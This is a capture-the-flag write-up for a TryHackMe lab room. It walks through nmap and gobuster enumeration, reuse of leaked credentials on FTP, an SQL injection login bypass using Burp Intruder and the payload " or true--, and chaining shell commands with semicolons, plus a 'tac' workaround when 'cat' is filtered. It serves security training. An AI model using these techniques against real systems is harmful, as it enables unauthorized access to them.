THM - Avengers Blog
Linux | SQLi
Tools For This Room
List of SQLi inputs - https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b
Use of semi-colon (;) - https://www.javatpoint.com/linux-semicolon
TL;DR / Executive Summary
Scan and enumerate with nmap and gobuster
Gain foothold with SQLi
Get final flag by stringing commands together using ; (semi-colon)
Initial nmap scan
This is a fairly simple room which is guided with prompts and multiple flags.
We kick things off with an nmap scan.
nmap
nmap -sV -sC -vv <IP>We get open ports: 21: FTP 22: SSH 80: HTTP
Checking out port80 brings us to this entertaining page:
Flag 1: Cookies
Scrolling to the bottom of the page, we find this username/password: groot/iamgroot
We'll be trying that on FTP and SSH later, but let's enumerate this page fully, by checking out the page source. At the bottom, we find a hint:
Clicking into the javascript, we get flag 1:
Flag 2: HTTP Headers
Next, we'll look in the HTTP headers by opening "Inspect Element (Q)" on Firefox, then navigating to "Network", and refreshing the page. Upon checking the filter options, we find flag 2.
Flag 3: FTP
Using the previously found combo of groot/iamgroot, let's try logging into FTP.
We're in! We poke around and download flag 3 to our machine to read it:
Gobuster
Looks like we've enumerated what we can from the nmap scan. Let's use gobuster to see if there are any directories to check out.
We get quite a few results, but the one we should check out is /portal.
SQL Injection
Checking out /portal brings us to a login page:
Unfortunately groot/iamgroot doesn't work here, nor do the typical admin/password combos. Trying out iconic lines from the Marvel movies don't work either. Boo.
Let's try a SQL injection to see if that works. We'll use Burpsuite and a list of SQLi Auth Bypass Payloads from here.
We start Burpsuite up, then turn on FoxyProxy in the browser. Next we add some text in the login fields and hit submit. Moving over to Burp, we'll find the "Proxy" tab is now orange. Right-clicking on the output, we select "Send to Intruder", and move over to the "Intruder" tab. Now we click the "Clear §" on the right of the page, which removes the purple fields. Now delete the text we added earlier on the login page, and double click "Add §" at the end of Username and Password. Since we're going to be inputting 2 fields (Username/Password), we'll use a Pitchfork attack.
Now to set our payloads to the list which we downloaded from the earlier website.
We start the attack and monitor the output. The successful attempts will have a different status code or length from the usual.
We'll notice that the successful attempt redirects to /home, instead of /portal. Looks like we can use " or true-- to login. Alternatively, we can just use the hint provided:
Now that we're in, we can view the page's source and find that it has 223 lines of code.
Flag 5: Remote Code Execution and Linux
Looks like we can execute commands via this page. However, we're limited to one command at a time. So we need to find a way to input multiple commands in one line. This can be done with a semi-colon.
you can put two or more commands on the same line separated by the semicolon. All the arguments before (;) will be treated as a separate command from all the arguments after the (;). All the commands will be executed sequentially waiting for each command to finish before starting the new one. - javaTpoint
We try a few commands, but realize the the "cat" command is disallowed. Also, the hint suggests a command to read a file's content in reverse. We end up with this command:
And we get our flag 5!
Alternatively, we could also use the command:
As the video walkthrough explains, "tac" is a common workaround when "cat" is not allowed.
Last updated